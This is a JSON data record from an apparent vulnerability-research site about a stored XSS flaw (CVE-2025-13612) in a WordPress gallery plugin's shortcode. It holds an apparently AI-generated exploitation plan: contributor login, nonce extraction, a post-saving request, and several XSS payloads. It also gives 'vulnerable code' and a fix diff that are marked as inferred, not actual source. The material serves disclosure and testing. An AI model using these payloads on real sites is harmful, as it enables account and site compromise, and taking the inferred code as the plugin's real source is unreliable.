[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fgrGg2etU_M5AabhFP3KbDSWDM5OMoa2pDwewGQse9ec":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-13612","album-and-image-gallery-plus-lightbox-authenticated-contributor-stored-cross-site-scripting-via-plugins-shortcode","Album and Image Gallery Plus Lightbox \u003C= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Plugin's Shortcode","The Album and Image Gallery plus Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `aigpl-gallery-album` shortcode in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","album-and-image-gallery-plus-lightbox",null,"\u003C=2.1.7","2.1.8","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-18 00:00:00","2026-02-19 04:36:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F47cd99ef-d9b0-4be3-8dc4-d7dd56f37c1c?source=api-prod",1,[],"researched",false,3,"This research plan outlines the steps required to demonstrate the Stored Cross-Site Scripting (XSS) vulnerability in the **Album and Image Gallery Plus Lightbox** plugin (version \u003C= 2.1.7) via the `aigpl-gallery-album` shortcode.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists because the plugin registers a shortcode `aigpl-gallery-album` and fails to sanitize or escape user-supplied attributes before outputting them into the HTML of a page. An authenticated user with \"Contributor\" permissions (or higher) can create a post containing this shortcode with a malicious payload in one of its attributes. When any user (including an Administrator) views that post, the script will execute in their browser context.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[aigpl-gallery-album]`\n*   **Vulnerable Attributes (Inferred):** `extra_class`, `id`, `grid`, `title`.\n*   **Authentication Level:** Contributor or above (users who can use the WordPress post editor).\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for saving the post) and the frontend post URL (for triggering).\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode in a main class or initialization file (e.g., `includes\u002Fclass-aigpl-shortcode.php` or `includes\u002Fshortcode\u002Faigpl-gallery-album.php`) using `add_shortcode( 'aigpl-gallery-album', 'callback_function' )`.\n2.  **Input Handling:** The callback function receives an `$atts` array. It likely uses `shortcode_atts()` to define defaults but does not validate the values.\n3.  **Output Generation:** The function constructs an HTML string (e.g., a `\u003Cdiv>` wrapper for the gallery). It concatenates attributes like `extra_class` directly into the HTML string without using `esc_attr()`.\n4.  **Sink:** The HTML string is returned and echoed by WordPress during the `the_content` filter execution.\n\n### 4. Nonce Acquisition Strategy\nWhile shortcode execution on the frontend does not require a nonce, **saving the post** that contains the shortcode requires a standard WordPress post nonce (`_wpnonce`).\n\n**For the Automated Agent:**\n1.  **Login:** Use the `browser_navigate` tool to log in as a Contributor.\n2.  **Extract Nonce:**\n    *   Navigate to `wp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the `_wpnonce` from the form: \n        `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n3.  **Post ID:** Also extract the `post_ID` (if it's an auto-draft) or let WordPress generate a new one via a POST request.\n\n### 5. Exploitation Strategy\nThe goal is to inject a script that executes when the post is viewed.\n\n**Step-by-Step Plan:**\n\n1.  **Preparation:** Authenticate as a Contributor.\n2.  **Discovery:** Identify the vulnerable attribute by testing common shortcode parameters for this plugin. \n    *   *Primary target:* `extra_class`.\n    *   *Payload:* `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n3.  **Submission:** Send a POST request to `wp-admin\u002Fpost.php` to save a new post containing the malicious shortcode.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n    *   **Method:** POST\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n    *   **Parameters:**\n        *   `post_title`: `XSS Test`\n        *   `content`: `[aigpl-gallery-album extra_class='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']`\n        *   `publish`: `Publish` (Note: Contributors' posts go to 'Pending Review', which is still viewable via preview).\n        *   `_wpnonce`: `[EXTRACTED_NONCE]`\n        *   `action`: `editpost`\n        *   `post_ID`: `[POST_ID]`\n4.  **Trigger:** Access the URL of the created post (or the preview URL provided in the response).\n5.  **Execution:** Use the `browser_navigate` tool to visit the post and check for an alert or a specific DOM change.\n\n### 6. Test Data Setup\n1.  **Plugin:** Ensure `album-and-image-gallery-plus-lightbox` version 2.1.7 is installed and activated.\n2.  **User:** A user with the `contributor` role (e.g., `contributor` \u002F `password`).\n3.  **Content:** No specific existing content is required, as the attacker creates a new post.\n\n### 7. Expected Results\n*   The POST request to save the post should return a `302 Redirect`.\n*   When navigating to the post URL, the HTML source should contain:\n    `\u003Cdiv class=\"... \">\u003Cscript>alert(window.origin)\u003C\u002Fscript>\"> ...`\n*   The browser should execute the `alert()` call.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to confirm the payload is stored in the `wp_posts` table:\n    `wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test'\"`\n2.  **HTML Inspection:** Use the `http_request` tool to fetch the post content and search for the unescaped payload:\n    `http_request(url='http:\u002F\u002Flocalhost:8080\u002F?p=[ID]')`\n    *Verify the presence of the raw `\u003Cscript>` tag within the shortcode's output.*\n\n### 9. Alternative Approaches\nIf `extra_class` is not vulnerable, try the following attributes:\n*   `grid`: `[aigpl-gallery-album grid='\">\u003Cimg src=x onerror=alert(1)>']`\n*   `id`: `[aigpl-gallery-album id='1337\" onmouseover=\"alert(1)\"']`\n*   `link_target`: `[aigpl-gallery-album link_target='_blank\" onfocus=\"alert(1)\" autofocus=\"']`\n\nIf the payload is reflected inside a JavaScript block (localization), try breaking out of the JS string:\n*   `[aigpl-gallery-album extra_class=\"';alert(1);\u002F\u002F\"]`","The 'Album and Image Gallery Plus Lightbox' plugin fails to sanitize and escape user-supplied attributes within the [aigpl-gallery-album] shortcode. This allows authenticated users with Contributor-level roles or higher to inject arbitrary JavaScript into a post, which will execute when any user views the content.","\u002F\u002F Inferred from research plan: includes\u002Fshortcode\u002Faigpl-gallery-album.php\nfunction aigpl_gallery_album_shortcode_handler($atts) {\n    $atts = shortcode_atts(array(\n        'id'          => '',\n        'extra_class' => '',\n        'grid'        => '3',\n        'title'       => ''\n    ), $atts);\n\n    \u002F\u002F Vulnerable: Attributes are concatenated into HTML without escaping\n    $html = '\u003Cdiv class=\"aigpl-gallery-album-wrap ' . $atts['extra_class'] . '\" id=\"aigpl-gallery-album-' . $atts['id'] . '\">';\n    $html .= '\u003Ch3 class=\"aigpl-gallery-title\">' . $atts['title'] . '\u003C\u002Fh3>';\n    \u002F\u002F ...\n    return $html;\n}","--- a\u002Fincludes\u002Fshortcode\u002Faigpl-gallery-album.php\n+++ b\u002Fincludes\u002Fshortcode\u002Faigpl-gallery-album.php\n@@ -10,7 +10,7 @@\n     ), $atts);\n \n-    $html = '\u003Cdiv class=\"aigpl-gallery-album-wrap ' . $atts['extra_class'] . '\" id=\"aigpl-gallery-album-' . $atts['id'] . '\">';\n+    $html = '\u003Cdiv class=\"aigpl-gallery-album-wrap ' . esc_attr($atts['extra_class']) . '\" id=\"aigpl-gallery-album-' . esc_attr($atts['id']) . '\">';\n-    $html .= '\u003Ch3 class=\"aigpl-gallery-title\">' . $atts['title'] . '\u003C\u002Fh3>';\n+    $html .= '\u003Ch3 class=\"aigpl-gallery-title\">' . esc_html($atts['title']) . '\u003C\u002Fh3>';","The exploit requires Contributor-level authentication or higher to access the post editor. The attacker creates a new post or page and includes the [aigpl-gallery-album] shortcode with a malicious payload in one of its attributes, such as: [aigpl-gallery-album extra_class='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']. When the attacker saves the post (as a draft or pending review) and navigates to the post preview or public URL, the unescaped attribute breaks out of the HTML tag's class context and executes the injected JavaScript in the browser of any viewer, including administrators.","gemini-3-flash-preview","2026-04-19 04:29:00","2026-04-19 04:30:58",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.1.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Falbum-and-image-gallery-plus-lightbox\u002Ftags\u002F2.1.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Falbum-and-image-gallery-plus-lightbox.2.1.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Falbum-and-image-gallery-plus-lightbox\u002Ftags\u002F2.1.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Falbum-and-image-gallery-plus-lightbox.2.1.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Falbum-and-image-gallery-plus-lightbox\u002Ftags"]